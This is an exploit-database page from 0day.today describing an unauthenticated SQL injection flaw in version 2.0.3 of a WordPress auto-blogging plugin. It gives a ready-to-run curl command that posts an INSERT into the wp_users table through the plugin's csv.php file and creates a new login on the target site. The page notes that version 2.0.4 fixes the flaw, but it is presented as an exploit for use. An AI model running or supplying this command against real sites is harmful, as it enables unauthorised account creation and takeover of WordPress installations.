[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Automatic Plugin v2.0.3 CSRF Exploit

Author
nick58
Risk
[
Security Risk Low
]
0day-ID
0day-ID-18666
Category
web applications
Date add
16-06-2012
Platform
php
Title:
======
Wordpress Automatic Plugin v2.0.3 CSRF Exploit
 
Date:
=====
2012-06-15
 
Website:
===========
http://codecanyon.net/item/wordpress-automatic-plugin/1904470
 
Introduction:
=============
Wordpress automatic plugin posts quality targeted articles, Amazon Products, clickbank Products, Youtube Videos and feeds posts on auto-pilot. just install and leave, it will work 24/7* to blog for you .
 
Exploit Details:
================
The vulnerability occurs in the csv.php file which does not require valid login credentials and can be used to execute SQL Queries
 
Using this cURL command a user can send this POST data which will create a new login:
$ curl --data q=INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_email`) VALUES ('test', '123456', 'jblow@gmail.com') http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php
 
Fix:
====
The author of this plugin has released a fix for this vulnerability and users are urged to upgrade to v2.0.4.



#  0day.today [2024-11-16]  #